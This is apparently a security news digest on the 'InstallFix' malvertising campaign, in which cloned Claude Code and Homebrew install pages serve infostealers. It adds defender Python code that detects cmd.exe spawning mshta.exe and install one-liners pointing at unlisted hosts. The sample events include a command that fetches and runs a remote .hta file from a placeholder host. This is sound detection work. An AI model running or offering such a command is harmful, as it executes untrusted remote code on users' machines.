
"Unless you're carefully reading the URL embedded in the install one-liner (and let's be honest, almost nobody does these days), the page is indistinguishable from the real one. The cloned page is a near-pixel-perfect replica of the legitimate one. The install one-liner on it, however, points to an attacker-controlled server that distributes an infostealer, instead of fetching the install script for Claude Code."
"Once the victim triggers the execution chain, cmd.exe spawns mshta.exe to retrieve and run code from a remote server, resulting in an Amatera Stealer infection. We saw different sites executing identical binaries, further indicating that these are part of a single attacker campaign."
"The cybersecurity firm also notes that threat actors are abusing legitimate domains such as Cloudflare Pages, Squarespace, and Tencent EdgeOne to host malicious content and blend with normal web traffic. Threat actors were also seen hosting malicious terminal commands on public pages on claude.ai, distributing the Cuckoo infostealer via clones of the Homebrew website."
InstallFix is a sophisticated malware distribution campaign that exploits user trust in popular development tools through cloned webpages and malvertising. Threat actors create near-pixel-perfect replicas of legitimate installation pages for tools such as Anthropic's Claude Code CLI and use Google Ads to increase their visibility. The malicious pages replace the legitimate install one-liner with a rogue one whose embedded URL points to an attacker-controlled server, so the command executes information-stealing malware instead of the real install script. Once triggered, cmd.exe spawns mshta.exe to retrieve and run code from the attacker's server, resulting in an Amatera Stealer infection. Threat actors abuse legitimate hosting services including Cloudflare Pages, Squarespace, and Tencent EdgeOne to serve the malicious content and blend in with normal traffic. The campaign extends beyond Claude Code to other platforms, including Homebrew, GitHub, and NPM packages, and also uses public pages on claude.ai to host malicious terminal commands.
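Two defender-side checks for the behaviour described above, written as an added example (not code from SecurityWeek or from the campaign report): one flags process-creation events where cmd.exe spawns mshta.exe with a remote URL, the other reports hosts in an install one-liner that are not on an operator-supplied allowlist. The event records, the allowlist and every hostname are constructed placeholders, and the event schema (pid, ppid, image, cmdline) is an assumption about the telemetry format.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (not real telemetry). Fields are
# an assumed schema: pid, parent pid, image name, full command line.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "cmd.exe",
     "cmdline": "cmd.exe /c mshta.exe https://cdn.example.invalid/x.hta"},
    {"pid": 300, "ppid": 200, "image": "mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/x.hta"},
    # Same parent, but a local .hta and no remote URL: should not be flagged.
    {"pid": 400, "ppid": 200, "image": "mshta.exe",
     "cmdline": r"mshta.exe C:\tools\local.hta"},
]

# Matches http(s) URLs up to whitespace or common shell delimiters.
URL_RE = re.compile(r"https?://[^\s'\"<>|)]+", re.IGNORECASE)


def find_mshta_chain(events):
    """Return (pid, url) for every mshta.exe event whose parent is cmd.exe and
    whose command line carries a remote URL, i.e. the chain described above."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if e["image"].lower() != "mshta.exe":
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or parent["image"].lower() != "cmd.exe":
            continue
        urls = URL_RE.findall(e["cmdline"])
        if urls:
            hits.append((e["pid"], urls[0]))
    return hits


def hosts_off_allowlist(oneliner, allowed_hosts):
    """Return hosts referenced by an install one-liner that are not on the
    expected vendor allowlist; a cloned page swaps in a different host."""
    allowed = {h.lower() for h in allowed_hosts}
    bad = []
    for url in URL_RE.findall(oneliner):
        host = (urlparse(url).hostname or "").lower()
        if host not in allowed:
            bad.append(host)
    return bad
```

The allowlist is the operator's own list of hosts from which the vendor's install script is legitimately fetched; any other host in a copied one-liner is the cue the first quote says nobody reads.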
#malware-distribution #phishing-and-social-engineering #information-stealer #malvertising #supply-chain-attack
Read at SecurityWeek